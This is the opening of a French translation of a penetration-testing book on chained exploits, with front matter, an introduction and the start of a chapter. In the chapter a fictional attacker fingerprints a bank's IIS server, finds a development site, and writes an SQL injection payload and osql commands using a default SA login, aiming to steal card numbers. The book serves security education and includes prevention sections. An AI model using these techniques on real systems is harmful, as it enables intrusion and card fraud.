You are on page 1of 302

Rfrence

Chanes dexploits
Scnarios de hacking avanc et prvention
Andrew Whitaker Keatron Evans Jack B. Voth

http://www.free-livres.com/

Rseaux et tlcom Programmation

Gnie logiciel

Scurit Systme dexploitation

CHANES dEXPLOITS
Scnarios de hacking avancs et prvention
Andrew Whitaker, Keatron Evans, Jack B. Voth

Traduit par Isabelle Hurbain-Palatin avec la contribution technique de Paolo Pinto (Sysdream)

Pearson Education France a apport le plus grand soin la ralisation de ce livre an de vous fournir une information complte et able. Cependant, Pearson Education France nassume de responsabilits, ni pour son utilisation, ni pour les contrefaons de brevets ou atteintes aux droits de tierces personnes qui pourraient rsulter de cette utilisation. Les exemples ou les programmes prsents dans cet ouvrage sont fournis pour illustrer les descriptions thoriques. Ils ne sont en aucun cas destins une utilisation commerciale ou professionnelle. Pearson Education France ne pourra en aucun cas tre tenu pour responsable des prjudices ou dommages de quelque nature que ce soit pouvant rsulter de lutilisation de ces exemples ou programmes. Tous les noms de produits ou marques cits dans ce livre sont des marques dposes par leurs propritaires respectifs.

Publi par Pearson Education France 47 bis, rue des Vinaigriers 75010 PARIS Tl. : 01 72 74 90 00 www.pearson.fr Mise en pages : TyPAO ISBN : 978-2-7440-4025-2 Copyright 2009 Pearson Education France Tous droits rservs

Titre original : Chained Exploits, Advanced Hacking Attacks from Start to Finish Traduit par Isabelle Hurbain-Palatin avec la contribution technique de Paolo Pinto (Sysdream) ISBN original : 978-0-321-49881-6 Copyright 2009 Pearson Education, Inc. Tous droits rservs dition originale publie par Addisson-Wesley Professional 800 East 96th Street, Indianapolis Indiana 46240 (USA)

Aucune reprsentation ou reproduction, mme partielle, autre que celles prvues larticle L. 122-5 2 et 3 a) du code de la proprit intellectuelle ne peut tre faite sans lautorisation expresse de Pearson Education France ou, le cas chant, sans le respect des modalits prvues larticle L. 122-10 dudit code. No part of this book may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording or by any information storage retrieval system, without permission from Pearson Education, Inc.

Table des matires


Remerciements................................................................................................................... propos des auteurs ......................................................................................................... Introduction ....................................................................................................................... Quest-ce quune chane dexploits ? ......................................................................... Organisation de ce livre .............................................................................................. Ressources supplmentaires ....................................................................................... Exclusion de responsabilit ........................................................................................ 1 Tent par une carte de crdit gratuite ? ..................................................................... Scnario ...................................................................................................................... Approche .................................................................................................................... Chane dexploits ........................................................................................................ Enqute sur le site web de PDXO ......................................................................... Enqute sur la base de donnes de cartes de crdit ............................................... Voler des numros de cartes de crdit partir du site web ................................... Vente des informations de cartes de crdit sur le march noir .............................. Dfaage du site web PDXO ................................................................................ Rsum de la chane dexploits ............................................................................ Mesures de prvention ................................................................................................ Changez len-tte de rponse HTTP par dfaut .................................................... Nayez pas daccs public aux sites web de dveloppement ................................ Ninstallez pas SQL Server sur le mme ordinateur quIIS ................................. Vriez les saisies sur les formulaires web .......................................................... Ninstallez pas IIS lemplacement par dfaut .................................................... Passez votre site web en lecture seule ................................................................... Supprimez les procdures stockes inutiles de votre base SQL ........................... Nutilisez pas de nom dutilisateur et de mot de passe par dfaut pour votre base de donnes ............................................................................................................ Mesures de prvention pour les particuliers ......................................................... Conclusion .................................................................................................................. 2 Espionner votre chef..................................................................................................... Scnario ...................................................................................................................... Approche .................................................................................................................... Pour plus dinformations ............................................................................................ IX XI 1 1 3 3 4 5 5 5 7 7 10 16 17 19 20 21 21 21 22 22 22 22 22 23 23 24 25 25 26 30

IV

Table des matires

Chane dexploits ........................................................................................................ Pige par hameonnage ........................................................................................ Installer les programmes ....................................................................................... Mettre en place le site web servant lhameonnage ........................................... Envoyer un courrier lectronique M. Vtille ...................................................... Trouver lordinateur de M. Vtille ........................................................................ Se connecter lordinateur du chef ...................................................................... WinPcap ................................................................................................................ Analyser les paquets capturs ............................................................................... Rassembler les images ........................................................................................ Autres possibilits ................................................................................................. Rsum de la chane dexploits ............................................................................ Mesures de prvention ................................................................................................ Mesures contre les attaques par hameonnage ..................................................... Mesures contre les chevaux de Troie .................................................................... Mesures contre les logiciels de capture de paquets .............................................. Conclusion .................................................................................................................. 3 Faire planter le site web de votre concurrent............................................................. Scnario ...................................................................................................................... Approche .................................................................................................................... Pour plus dinformations ............................................................................................ Chane dexploits ........................................................................................................ Attaque n 1 : le test .............................................................................................. Attaque n 2 : lattaque qui fonctionne ................................................................. Accder au site web intermdiaire ........................................................................ Tester lattaque dans un environnement contrl ................................................. Modier le site web intermdiaire ........................................................................ Autres possibilits ................................................................................................. Rsum de la chane dexploits ............................................................................ Mesures de prvention ................................................................................................ Mesures de prvention pour les informations sur votre entreprise accessibles aux pirates ............................................................................................................ Mesures de prvention contre les attaques par DDoS via ICMP .......................... Mesures de prvention contre les attaques par DDoS via HTTP ou dautres protocoles ........................................................................................... Mesures de prvention contre les modications non autorises de sites web ...... Mesures de prvention contre la corruption de salaris ........................................ Conclusion .................................................................................................................. 4 Espionnage industriel................................................................................................... Scnario ...................................................................................................................... Approche .................................................................................................................... Chane dexploits ........................................................................................................ Reconnaissance .....................................................................................................

33 34 36 44 44 49 50 52 53 56 59 59 60 60 61 62 62 63 63 66 67 68 68 76 78 81 91 95 95 96 96 97 97 98 99 100 101 101 104 104 104

Table des matires

Obtenir un accs physique .................................................................................... Excuter les attaques ............................................................................................. Organiser la panne lhpital ............................................................................... Autres possibilits ................................................................................................. Rsum de la chane dexploits ............................................................................ Mesures de prvention ................................................................................................ Mesures de prvention contre les atteintes la scurit physique et la compromission des systmes daccs ........................................................... Mesures de prvention contre les scans ................................................................ Mesures de prvention contre lingnierie sociale ................................................ Mesures de prvention contre les attaques sur les systmes dexploitation ......... Mesures de prvention contre le vol de donnes .................................................. Conclusion .................................................................................................................. 5 Chane dentreprises .................................................................................................... Scnario ...................................................................................................................... Approche .................................................................................................................... Chane dexploits ........................................................................................................ Reconnaissance ..................................................................................................... Attaque par ingnierie sociale ............................................................................... Reconnaissance supplmentaire ........................................................................... Reconnaissance active agressive ........................................................................... Construire linfrastructure de lexploit ................................................................. Tester lexploit ...................................................................................................... Effectuer lattaque ................................................................................................. Construire le rootkit .............................................................................................. Rsultat ................................................................................................................. Autres possibilits ................................................................................................. Rsum de la chane dexploits ............................................................................ Mesures de prvention ................................................................................................ Mesures de prvention contre la reconnaissance passive de votre entreprise ....... Mesures de prvention contre lattaque dingnierie sociale Visu IQ ................ Mesures de prvention contre la reconnaissance sur le logiciel de Visu IQ ......... Mesures de prvention contre lattaque par Wi-Fi du rseau domestique de Quizzi Mesures de prvention contre lattaque par keylogger ......................................... Conclusion .................................................................................................................. 6 Obtenir un accs physique des dossiers mdicaux ................................................. Scnario ...................................................................................................................... Approche .................................................................................................................... Pour plus dinformations ............................................................................................ Chane dexploits ........................................................................................................ Ingnierie sociale et piggybacking ........................................................................ Obtenir un accs physique .................................................................................... Accder Windows via Backtrack .......................................................................

108 114 119 132 133 134 134 135 135 136 136 137 139 139 140 141 141 149 151 154 163 169 178 180 184 185 185 187 187 187 187 188 188 189 191 191 193 193 194 195 209 215

VI

Table des matires

Modier des informations mdicales .................................................................... Rsum de la chane dexploits ............................................................................ Mesures de prvention ................................................................................................ Mesures contre lingnierie sociale et le piggybacking ........................................ Mesures contre le crochetage ................................................................................ Mesures contre lchec de la biomtrie ................................................................ Mesures contre la compromission dun PC .......................................................... Conclusion .................................................................................................................. 7 Attaquer des rseaux sociaux ...................................................................................... Scnario ...................................................................................................................... Approche .................................................................................................................... Chane dexploits ........................................................................................................ Crer un faux site MySpace .................................................................................. Crer le site web de redirection ............................................................................ Crer une page MySpace ...................................................................................... Envoyer un commentaire ...................................................................................... Compromettre le compte ...................................................................................... Se connecter au compte pirat .............................................................................. Rsultats ................................................................................................................ Rsum de la chane dexploits ............................................................................ Mesures de prvention ................................................................................................ vitez les rseaux sociaux .................................................................................... Utilisez un prol priv .......................................................................................... Soyez prudent en cliquant sur un lien ................................................................... Exigez un nom de famille ou une adresse de courrier lectronique pour les demandes de contact ............................................................................... Ne publiez pas trop dinformations ...................................................................... Faites attention lorsque vous saisissez vos informations de connexion ................ Utilisez un mot de passe fort ................................................................................. Modiez frquemment votre mot de passe ........................................................... Utilisez des outils antihameonnage ..................................................................... Conclusion .................................................................................................................. 8 Panique au club de golf ................................................................................................ Scnario ...................................................................................................................... Approche .................................................................................................................... Pour plus dinformations ............................................................................................ Accder aux rseaux via les points daccs sans-l ............................................. Chane dexploits ........................................................................................................ Connexion un point daccs ............................................................................... Attaque de la pr-authentication Microsoft Kerberos ...................................... Craquer des mots de passe avec RainbowCrack ................................................... Vol des donnes du club ........................................................................................ Rsum de la chane dexploits ............................................................................

217 218 218 218 221 221 221 222 223 223 224 225 226 228 230 232 234 235 237 238 238 238 239 239 240 240 240 240 241 241 241 243 243 246 247 249 249 249 258 263 266 266

Table des matires

VII

Mesures de prvention ................................................................................................ Scurisez les points daccs .................................................................................. Congurez convenablement Active Directory ...................................................... Utilisez un systme de prvention ou de dtection dintrusion ............................ Mettez jour votre antivirus rgulirement .......................................................... Liste de contrle de scurit informatique ............................................................ Conclusion .................................................................................................................. Index ...................................................................................................................................

267 267 268 270 270 270 275 277

Remerciements
DAndrew Whitaker
De nombreuses personnes ont contribu la cration de ce livre. Tout dabord, celui-ci naurait jamais vu le jour sans le travail assidu de mes coauteurs, Keatron Evans et Jack Voth. Merci vous deux dtre si attachs produire du travail de qualit. Ensuite, je dois remercier Brett Bartow et Drew Cupp. Brett, merci pour cette nouvelle opportunit : cest toujours un plaisir de travailler ensemble. Drew, merci pour les longues heures passes corriger notre travail. Kevin Henry et Ralph Echemendia ont galement contribu ldition de ce livre. Vos retours ont largement amlior cet ouvrage, cest un honneur que davoir travaill avec vous sur ce projet. David Williams, merci pour les ides dillustrations du chapitre sur lespionnage industriel et pour avoir rchi des ides de chapitres avec moi lors de la Defcon il y a quelques annes. Je remercie galement Adrienne Felt pour son aide quant aux informations pour le chapitre sur les rseaux sociaux. Pour nir, des remerciements particuliers Steve Guadino, Chris Porter et Dave Minutella de Training Camp pour leur aide pendant cette anne et pour leur engagement continu fournir les meilleures formations du monde sur la scurit de linformation.

De Keatron Evans
Jaimerais remercier en particulier les personnes suivantes, qui ont t utiles pour aider terminer ce livre. Sheilina Stingley, pour sa relecture alors que lcriture nen tait quau stade de lide. Brett Bartow et Andrew Cupp, pour nous avoir offert la souplesse dcrire ce livre comme nous le voulions. Andrew Whitaker pour avoir partag cette fabuleuse opportunit. Jack Koziol pour avoir t mon premier mentor dans la scurit et pour mavoir aid passer le plus difcile il y a plusieurs annes. Vashun Cole pour linspiration et la motivation.

De Jack Voth
Jaimerais signaler, titre indicatif, qucrire un livre est bien plus difcile que cela nen a lair. Cela dit, merci Andrew Whitaker et Brett Bartow pour cette opportunit.

propos des auteurs


Andrew Whitaker (M.Sc., CISSP, CEI, LPT, ECSA, CHFI, CEH, CCSP, CCNP, CCVP, CCDP, CCNA, CCDA, CCENT, MCSE, MCTS, CNE, A+, Network+, Convergence+, Security+, CTP, EMCPA) est un expert, formateur et auteur reconnu dans le domaine des tests dintrusion et des contre-mesures de scurit. Il est le directeur du programme Enterprise InfoSec and Networking et instructeur en piratage thique chez Training Camp. Ces dernires annes, ses cours ont form des milliers de professionnels de la scurit dans le monde entier. Ses formations en scurit ont galement attir lattention, entre autres, du Wall Street Journal, de Business Week et du San Francisco Gate. Keatron Evans est testeur dintrusion senior et prsident de Blink Digital Security, Chicago, dans lIllinois. Il a accumul plus de onze ans dexprience dans le test dintrusion, lvaluation de vulnrabilit et les outils danalyse. Keatron conseille et parfois forme diverses entits gouvernementales et entreprises dans les domaines de lintrusion rseau, des systmes de scurit SCADA et dautres sujets lis la scurit des infrastructures nationales. Il est titulaire de plusieurs certications de scurit de linformation, y compris CISSP, CSSA, CEH, CHFI, LPT, CCSP, MCSE:Security, MCT et Security+. Lorsquil neffectue pas de tests dintrusion, Keatron est formateur des cours de piratage thique et doutils danalyse chez Training Camp et chez quelques autres organismes de formation sur la scurit. Jack Voth a travaill dans le domaine des technologies de linformation pendant vingtquatre ans. Il est titulaire de nombreuses certications industrielles, y compris CISSP, MCSE, L|PT, C|EH, C|HFI, E|CSA, CTP, Security+, ACA, MCT, CEI et CCNA. Ses spcialits sont le test dintrusion, lvaluation de vulnrabilit, la scurit de primtres et les architectures rseau voix/donnes. En plus dtre copropritaire et ingnieur senior de The Client Server, Inc., Jack est formateur depuis plus de six ans sur des sujets autour de Microsoft, de la TIA (Telecommunications Industry Association), de lEC-Council, dISC/2 et de CompTIA.

Introduction
Chaque fois que nous parlons du contenu de ce livre, nous obtenons systmatiquement la mme raction : "Nest-ce pas illgal ?" Nous rpondons que si. La majorit des sujets traits par cet ouvrage sont compltement illgaux si vous recrez les scnarios en dehors dun environnement de test. Cela amne alors la question de la raison pour laquelle nous avons voulu crire ce livre. La rponse est simple. Ce livre est ncessaire sur le march pour duquer dautres utilisateurs aux exploits chans. Au cours de nos carrires, nous avons aid scuriser des centaines dorganisations. Les gens ne savent pas comment une attaque peut rellement se produire. Ils doivent tre forms sur le mode opratoire de telles attaques sophistiques pour pouvoir se protger efcacement contre elles. Nous sommes tous expriments la fois dans le test dintrusion (sintroduire dans des organisations sans autorisation pour valuer leurs faiblesses) et dans la formation grce aux cours de scurit et de piratage thique de Training Camp (http://www.trainingcamp.com). La plupart des chapitres de ce livre proviennent dattaques que nous avons effectues avec succs lors de tests dintrusion rels. Nous voulons les partager pour que vous sachiez comment arrter des attaquants malveillants. Nous reconnaissons tous que cest la formation qui prsente le plus gros impact, et ce livre est aussi lexpression de notre passion pour la formation en scurit.

Quest-ce quune chane dexploits ?


Il existe dexcellents ouvrages sur le march de la scurit informatique. Il manquait cependant un livre couvrant les chanes dexploits et les mesures de prvention efcaces. Une chane dexploits est une attaque qui implique des exploits ou des attaques multiples. Un pirate nutilise en gnral pas une seule mthode, mais bien plusieurs, pour atteindre sa cible. Considrez lexemple de ce scnario. Un collgue vous appelle, dsespr, 2 heures du matin, et vous annonce que votre site web a t compromis. Vous sautez du lit, attrapez une casquette et quelques vtements, et vous vous prcipitez au bureau.

Chanes dexploits

Lorsque vous arrivez, votre chef et vos collgues sont paniqus et ne savent que faire. Vous regardez le serveur web et parcourez les journaux dactivit. Rien ne semble suspect. Vous accdez au pare-feu et examinez ses journaux. Vous ne voyez pas de trac inhabituel destination de votre serveur web. Que faites-vous ? Nous esprons que votre raction sera : "Prenons du recul, et examinons la situation gnrale." Examinez votre infrastructure. Vous avez peut-tre des machines ddies lauthentication, des rpartiteurs de charge, des commutateurs, des routeurs, des serveurs de sauvegarde, des serveurs VPN (Virtual Private Network, ou rseau priv virtuel), des concentrateurs, des serveurs de base de donnes, des serveurs dapplication, des serveurs web, des pare-feu, des dispositifs de chiffrage, des serveurs de stockage, des dispositifs de dtection dintrusion, et bien plus encore. Chacun de ces dispositifs et de ces serveurs fait fonctionner des logiciels. Chacun de ces logiciels est une porte dentre possible. Dans ce scnario, lattaquant na peut-tre pas attaqu le serveur web depuis lextrieur. Il peut avoir compromis un routeur. Il peut alors le recongurer pour accder au serveur de sauvegardes qui gre toutes les sauvegardes de votre centre de donnes. Il peut ensuite utiliser un exploit de dbordement de tampon auquel votre logiciel de sauvegardes est vulnrable pour obtenir des droits dadministration sur votre serveur de sauvegardes. Il peut lancer une attaque pour brouiller le systme de dtection dintrusion pour que lattaque proprement parler passe inaperue. Il peut ensuite attaquer depuis le serveur de sauvegarde le serveur contenant tous vos journaux. Il peut effacer tous les journaux pour couvrir ses traces et attaquer votre serveur web. Vous lavez sans doute compris : les attaques sont rarement simples. Elles impliquent souvent plusieurs attaques chanes ensemble pour en former une grosse. Votre travail, en tant que responsable de la scurit, est dtre constamment conscient de la vue densemble et de tout prendre en compte lorsque votre systme est attaqu. Un pirate habile agit de faon trs analogue aux fourmis de la couverture de cet ouvrage. Sur la couverture, les fourmis sont en ligne : elles sont toutes indpendantes, mais font partie dune chane. Les fourmis travaillent galement sans que personne ne les voie, tout comme un pirate habile travaille dans lombre. Utilisez ce livre comme un pesticide : apprenez o se cachent les pirates pour pouvoir les liminer et pour les empcher daccder votre organisation.

Introduction

Organisation de ce livre
Ce livre utilise un personnage de ction nomm Phnix. Il nest pas ncessaire de lire les chapitres dans lordre : si vous souhaitez passer directement un chapitre qui vous intresse particulirement, nhsitez pas. Chaque chapitre commence par une section "Scnario", o nous dtaillons le scnario la base de la motivation de Phnix pour lattaque. Vous apprendrez comment lavidit ordinaire ou le dsir de vengeance peuvent mener des attaques sophistiques ayant des consquences graves. Les chapitres contiennent ensuite une section intitule "Chane dexploits", qui dtaille tape par tape lapproche employe par notre personnage ctif pour attaquer. Cette section vous apprendra quune attaque dpasse lutilisation dun unique outil pour accder un ordinateur. Lattaque provient parfois de lintrieur de lorganisation, mais elle peut aussi provenir de lextrieur. Vous apprendrez mme comment Phnix atteint ses buts en compromettant la scurit physique et en usant dingnierie sociale. Chaque chapitre se termine par une section "Mesures de prvention" contenant des informations que vous pouvez utiliser pour viter lexploit discut dans le chapitre. Vous devriez comparer ces informations avec vos propres politiques et procdures de scurit pour dterminer si votre organisation peut ou devrait dployer ces mesures.
INFO De nombreux sites web et organisations mentionns dans les morceaux de scnarios de ce livre sont ctifs et ne sont l qu titre dillustration. Par exemple, au Chapitre 2, "Espionner votre chef", le site web certicationpractice.com que Phnix copie pour sa tentative dhameonnage nexiste pas rellement, mme si de nombreux sites du mme type existent.

Ressources supplmentaires
Nous voulions ajouter beaucoup dautres choses dans ce livre, mais cela na pas t possible pour des raisons de manque de temps. Vous trouverez plus dinformations (en anglais) sur les exploits chans sur le site www.chainedexploits.com. Ce site contient des informations supplmentaires propos des exploits chans ainsi que les ventuels errata de ldition originale de ce livre.

Chanes dexploits

Exclusion de responsabilit
Les attaques dcrites dans ce livre sont illgales si elles sont effectues en dehors dun environnement de laboratoire. Tous les exemples de ce livre sont tirs de lexprience des auteurs qui ont effectu des tests dintrusion autoriss dans certaines organisations. Les auteurs ont ensuite recr les exemples dans un environnement de laboratoire pour assurer leur exactitude. Vous ne devez pas tenter dutiliser les attaques dcrites dans ce livre. Si vous souhaitez les utiliser pour valuer la scurit de votre organisation, assurezvous dobtenir au pralable une autorisation crite des intervenants-cl et des responsables adquats avant deffectuer le moindre test.

1
Tent par une carte de crdit gratuite ?
Scnario
Phnix ne peut pas en croire ses yeux. Vous ne pensiez probablement pas quun relev de compte pouvait avoir un tel impact sur quiconque, mais cest le cas de celui-ci. Ce relev de la banque nancire PDXO informe Phnix que le taux dintrt de sa carte de crdit vient de passer 29 % en raison dun retard de paiement. Avec un tel taux dintrt, Phnix na que peu despoir de pouvoir un jour rembourser sa dette de 12 000 $. Frustr, Phnix commence laborer un plan pour se venger de la banque. Il envisage dabord de sintroduire dans la banque et dannuler sa dette de carte de crdit. Cela risque cependant dtre trop visible et dattirer lattention. Il doit plutt trouver un moyen de payer sa dette sans quaucun systme ne paraisse compromis. Aprs mre rexion, Phnix arrive au plan parfait.

Approche
Phnix va dabord rassembler des informations sur le site web de la banque et trouver un moyen de compromettre la banque via son site web. Il pntrera ensuite dans le site web de la banque et essaiera de voler des numros de carte de crdit. Il pourrait utiliser la carte de quelquun dautre pour payer ses dettes, mais cela veillerait probablement des soupons au moment o le propritaire de la carte dcouvrirait le paiement de

Chanes dexploits

12 000 $. Phnix dcide plutt de vendre les numros de cartes de crdit voles la banque sur le march noir. Aprs avoir reu le paiement de cette opration, il pourra payer ses dettes. Pour rduire les risques dtre surpris, Phnix utilisera galement une technique de distraction populaire chez les pirates : il lancera une seconde attaque que la banque dcouvrira et sur laquelle elle enqutera. Lattention de la banque sera dtourne et celle-ci passera tellement de temps enquter sur lattaque quelle ne souponnera pas une personne remboursant une dette de carte de crdit de 12 000 $. Phnix dcide de dfacer1 le site web de la banque dans le cadre de son attaque secondaire. En rsum, Phnix effectuera les tches suivantes : 1. enquter sur le site web ; 2. enquter sur la base de donnes des cartes de crdit ; 3. voler les numros de cartes de crdit depuis le site web ; 4. vendre les numros de cartes de crdit sur le march noir ; 5. dfacer le site web. Ce chapitre dtaille les diffrentes tapes et conclut en prsentant diffrentes mesures de prvention pour limiter les risques.

Enqute Une enqute est le processus permettant dobtenir des informations sur une victime ou sur une cible. Dans ce chapitre, lenqute porte sur les informations relatives au site web et la base de donnes de cartes de crdit. Il est par exemple utile Phnix denquter sur le systme dexploitation sur lequel fonctionne le site web : cette information laide connatre les vulnrabilits quil peut tenter dexploiter.

1. N.D.T. : Dfacer un site web consiste le modier de faon non autorise, pour afcher un message politique ou simplement pour sattribuer le crdit dun piratage russi.

Chapitre 1

Tent par une carte de crdit gratuite ?

Chane dexploits
Cette section traite des dtails de chaque tape de la chane dexploits chan de Phnix, y compris :
m m m m m

lenqute sur le site web de PDXO ; lenqute sur la base de donnes de cartes de crdit ; le vol des numros de cartes de crdit partir du site web ; la vente des numros de cartes de crdit sur le march noir ; le dfaage du site web de PDXO.

Cette section se termine par un rsum de cette chane dexploits. Enqute sur le site web de PDXO La premire tape pour Phnix est denquter sur le site web de la banque nancire PDXO. Contrairement ce que vous pourriez penser, il ne commence pas par accder au site web : cela ne laidera pas dans la premire tape de son enqute. Il cherche plutt dcouvrir le systme dexploitation et le serveur web qui font fonctionner le site. Un excellent moyen daccomplir cela est dexaminer len-tte HTTP (HyperText Transfer Protocol, protocole de transfert hypertexte). HTTP est un standard de requte/ rponse entre un client et un serveur. Lorsque vous vous connectez un serveur web avec votre navigateur, une requte HTTP est envoye. Tous les serveurs web renvoient des en-ttes de rponse HTTP mis en forme conformment la RFC (Request for Comments, demande de commentaires) 2616. Cette rponse contient des informations prcieuses telles que la version du serveur web. Connatre la version du serveur web est utile pour un pirate : cela lui permet de dterminer quels exploits employer. Par exemple, lorsque le pirate sait quil sagit dun serveur Microsoft IIS, il peut tirer avantage des vulnrabilits associes ce serveur. Il est inutile dessayer dutiliser un exploit conu pour un serveur web Apache sur un serveur Microsoft IIS (et vice versa). En temps normal, vous ne voyez jamais la rponse HTTP. Votre navigateur reoit linformation du serveur web, linterprte comme ncessaire et afche le site web dans votre navigateur. Phnix doit connatre cette rponse pour savoir quelle version du serveur web est utilise. Il se connecte donc au serveur web avec Telnet. Plutt que

Chanes dexploits

dutiliser le port TCP Telnet standard, cest--dire 23, il se connecte au port HTTP du serveur web, soit 80, en saisissant ce qui suit :
C:\>telnet www.PDXOfinancial.com 80

Cette commande connecte directement Phnix au serveur web. Cependant, elle ne renvoie rien car Phnix na pas encore envoy de requte HTTP. Pour obtenir la rponse dont il a besoin, Phnix envoie une commande HTTP HEAD pour obtenir len-tte HTTP. Len-tte HTTP rvle des informations comme le type de serveur web utilis par la banque nancire PDXO. Phnix tape sa commande suivie de deux retours chariot (rc) :
HEAD / http/1.1 [rc] [rc]

La rponse suivante est envoye :


HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Mon, 27 Apr 2009 16:18:10 GMT Content-Length: 1270

Daprs cette rponse, Phnix dcouvre que la banque utilise le serveur Microsoft IIS 5.0. Il sait maintenant quil doit chercher un moyen dexploiter un serveur IIS 5.0.

GoolagScan Un des outils que vous devriez considrer pour dcouvrir dventuelles vulnrabilits sur votre site web est GoolagScan de Cult of the Dead Cow (http:// www.cultdeadcow.com). Cet outil a recours des techniques dattaque utilisant Google dcouvertes par Johnny Long (http://johnny.ihackstuff.com). Cet outil excute des requtes Google spciales diriges sur un site web donn pour dcouvrir des faiblesses telles que des fichiers contenant des mots de passe, des fichiers vulnrables et des rpertoires sensibles. Cest un outil essentiel pour quiconque cherche valuer les faiblesses dun site web.

Phnix rchit ce quil sait dautre sur la banque nancire PDXO. Il se souvient quils ont rcemment annonc une fusion avec une banque Chicago. La fusion de deux banques implique invitablement la modication du site web de lune des banques. Souvent, les entreprises font lerreur de laisser fonctionner les serveurs web

Chapitre 1

Tent par une carte de crdit gratuite ?

de dveloppement, qui peuvent tre moins scuriss que le site en production. Phnix commence chercher ces sites de dveloppement. Il essaie de saisir les adresses suivantes dans son navigateur :
m m m m

http://beta.PDXOnancial.com ; http://test.PDXOnancial.com ; http://developer.PDXOnancial.com ; http://dev.PDXOnancial.com.

Cette dernire adresse fonctionne ! Elle renvoie une page illustre la Figure 1.1. La page web est simple ; elle est utilise par les dveloppeurs web pour tester leur code. Les utilisateurs de la banque ne devraient pas pouvoir accder ce site de dveloppement, mais il est probable que les dveloppeurs ne laient pas sufsamment protg.

Figure 1.1
Site web de dveloppement.

Ce site de dveloppement a un formulaire pour se connecter la banque. Phnix sourit : il sait que ce formulaire pourrait lui fournir laccs dont il a besoin pour obtenir les numros de cartes de crdit.

10

Chanes dexploits

Enqute sur la base de donnes de cartes de crdit Ltape suivante, pour Phnix, est denquter sur la base de donnes utilise pour enregistrer les informations de comptes. Le formulaire de connexion accde la base de donnes dont il veut extraire des informations. En utilisant le champ du nom dutilisateur, il peut essayer de saisir des commandes SQL (Structured Query Language, langage de requtes structures) pour dcouvrir le nom de la base de donnes. Cela requiert que plusieurs faiblesses du site web se cumulent : Phnix espre que les dveloppeurs ont laiss ces vulnrabilits sur le site. Ces faiblesses sont les suivantes :
m m m

La base de donnes est enregistre sur le mme serveur que le site web. La base de donnes utilise est Microsoft SQL Server. Le nom dutilisateur par dfaut, SA, sans mot de passe, est utilis pour se connecter la base de donnes. Le site web est install dans lemplacement par dfaut (c:\inetpub\wwwroot\). Le rpertoire du site web est accessible en criture.

m m

Comme le site web fonctionne sous Microsoft IIS Server (ce qui a t dtermin dans lenqute sur le site web), il est probable que la base de donnes soit Microsoft SQL Server. Les autres faiblesses sont probables car le site est prvu uniquement pour les dveloppeurs et il peut tre moins protg que le site en production.
INFO Vous avez peut-tre limpression que nous harcelons les dveloppeurs quant la faiblesse de la scurit. Au contraire, les faiblesses ne proviennent pas dun code dcient ni de la mise en uvre quen font les dveloppeurs, mais elles existent parce que la hirarchie ne voit pas lintrt de passer du temps mettre en place des mesures de scurit pour les quipes de dveloppeurs. Habituellement, les dveloppeurs sont pousss respecter les chances et cela implique souvent une scurit plus laxiste. Ladministration doit tre consciente de limportance de la scurit applicative et des contrles daccs et doit sassurer que les procdures sont en place pour mettre en uvre les politiques de scurit du dbut la n du cycle de vie du dveloppement.

Les injections SQL sont une technique permettant de saisir des commandes SQL directement dans un serveur SQL partir dun site web. Normalement, un dveloppeur web ne devrait pas autoriser la saisie de commandes SQL dans un formulaire : seuls des noms dutilisateur et des mots de passe devraient tre autoriss. Cependant, moins que

Chapitre 1

Tent par une carte de crdit gratuite ?

11

du code ne soit ajout pour assainir les saisies, un pirate peut ventuellement envoyer des commandes SQL directement la base de donnes, ce qui est dangereux car cela permet aux pirates daccder aux donnes de votre base. La premire tape de Phnix est dobtenir la liste des bases de donnes du serveur. Sur une base Microsoft SQL Server, il existe une base de donnes par dfaut nomme Master. Chaque base de donnes est compose de plusieurs tables qui regroupent des colonnes et des lignes pour stocker les donnes. Dans la base Master, il existe une table sysdatabases qui dresse la liste de toutes les bases de donnes sur le serveur. La commande permettant dafcher la liste de toutes les bases de donnes est :
select * from master..sysdatabases

Malheureusement, Phnix ne peut pas se contenter de saisir la commande et den voir le rsultat. Il doit amener le serveur lautoriser saisir sa commande. Pour linstant, le site web sattend ce quun nom dutilisateur soit saisi dans le premier champ du formulaire. Phnix doit saisir une nouvelle commande laquelle le serveur ne sattend pas. En SQL, on termine une commande avec un point-virgule. Phnix induit le serveur en erreur et lui fait croire que la commande courante est termine en faisant prcder sa commande SQL dun point-virgule :
; select * from master..sysdatabases

Pour sassurer quaucune autre commande ne sera ajoute aprs la sienne, Phnix doit commenter le reste du SQL du site web. Il met donc en commentaire le reste du code la suite de sa commande SQL, ce qui fait croire au serveur SQL que tout le code suivant sa commande nest compos que dun commentaire crit par un dveloppeur SQL et non du code devant tre excut. Pour commenter le code qui suit sa commande SQL, Phnix saisit sa commande suivie de deux tirets, comme ceci :
; select * from master..sysdatabases--

Cette commande pourrait fonctionner, mais elle nenverra pas de sortie lcran. Phnix doit rediriger la sortie vers un autre chier du site web quil pourra ensuite rcupr. Une mthode pour envoyer ces donnes un chier est dutiliser lutilitaire en ligne de commande OSQL. OSQL est fourni avec Microsoft SQL Server et permet de saisir des commandes SQL partir dune invite de commande MS-DOS. Lorsque vous saisissez des commandes dans une invite de commande, vous pouvez transmettre la sortie un chier texte. Les options de la commande OSQL sont indiques ci-aprs :

12

Chanes dexploits

C:\>osql -? utilisation: osql [-S serveur] [-d utiliser le nom de la base de donnes]@ [-h en-ttes] [-a taille du paquet]

[-U ID de connexion] [-H nom de lhte] [-l limite du temps de connexion] [-s sparateur de colonnes] [-e entre dcho]

[-L liste des serveurs] [-c fin de cmd] [-q requte cmdline] [-Q requte cmdline et quitter] [-n supprimer la numrotation] [-m niveau derreur] [-r msgs vers stderr] [-V gravit] [-i fichier dentre] [-o fichier de sortie] [-p imprimer les statistiques] [-b abandon du lot dinstructions aprs erreur] [-X[1] dsactive les commandes [et quitte sans avertissement]] [-O utiliser le comportement Old ISQL dsactive les lments suivants] <EOF> traitement par lot dinstructions Mise lchelle automatique de la largeur de la console Messages larges niveau derreur par dfaut de -1 au lieu de 1 [-? description de la syntaxe]

[-P mot de passe] [-E connexion approuve] [-t limite du temps de requte] [-w largeur de colonne] [-I Activer les identificateurs marqus] [-D nom ODBC DSN]

Les paramtres utiliss par Phnix et leur signication sont recenss dans le Tableau 1.1.
Tableau 1.1 : Paramtres OSQL

Paramtre -U -P -Q -o

Signication Phnix utilise le nom dutilisateur SA, qui est le nom dutilisateur par dfaut. Par dfaut, il ny a pas de mot de passe : Phnix laisse ce paramtre vide. -Q permet Phnix de saisir sa commande SQL et de quitter. Phnix envoie la sortie vers un fichier.

